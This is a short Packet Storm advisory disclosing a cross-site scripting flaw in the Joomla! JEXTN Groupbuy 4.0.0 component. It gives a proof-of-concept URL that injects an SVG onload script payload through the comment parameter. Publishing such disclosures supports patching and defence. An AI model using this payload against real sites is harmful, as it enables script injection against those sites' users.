Joomla! JEXTN Groupbuy component version 4.0.0 suffers from a cross site scripting vulnerability.
d27cd033b683a2891e766aedf105334e82e7ecfb2229f04fd22882b6c95e1208################################################
#Title: Joomla! JEXTN Groupbuy 4.0.0 - XSS
#Credit: Bilal KARDADOU
#Vendor: http://www.jextn.com
#URL:
https://extensions.joomla.org/extensions/extension/social-web/social-buy/jextn-groupbuy/
#Product: 'Joomla! JEXTN Groupbuy 4.0.0'
#Developer: jextn.com
#Last updated: Jan 04 2016
#Compatibility: 3.X
#Type: Paid download
################################################
#
# GET -p
#
http://127.0.0.1/joomla/index.php?option=com_jegroupbuy&view=jegroupbuy&task=addComments&comment=hello11%3Csvg/onload=prompt(123);%3E&pid=4&tmpl=component
# PoC:
# https://prnt.sc/hul4p1
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed